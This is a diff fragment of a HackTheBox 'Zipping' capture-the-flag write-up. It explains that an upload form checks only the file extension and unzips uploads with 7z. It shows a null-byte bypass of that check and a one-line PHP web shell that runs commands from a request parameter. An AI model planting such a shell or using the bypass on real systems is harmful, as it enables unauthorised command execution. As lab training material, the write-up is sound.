RunarSmith/writeups/hackthebox/medium/zipping/README.md

 done
 ```

-In the upload.php, the only protection is a filter on the extension name :
+In the `upload.php`, the only protection is a filter on the extension name :

 ```php
 if (pathinfo($fileName, PATHINFO_EXTENSION) === "pdf") {
 ```

-we also have the uncompress command :
+We also have the uncompress command that is calling `7z` application :

 ```php
 echo exec('7z e '.$zipFile. ' -o' .$uploadPath. '>/dev/null');
 ```

-the extension check could be bypassed with a null byte : file.php[null].pdf
+The extension check could be bypassed with a null byte : `file.php[null byte].pdf`

-shell.php:
+Let's use `shell.php`, that will execute a simple command:

 ```php
 <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
 ```

-pdf_archiver.py :
+We can craft `pdf_archiver.py` that will archive this file :

 ```python
 import zipfile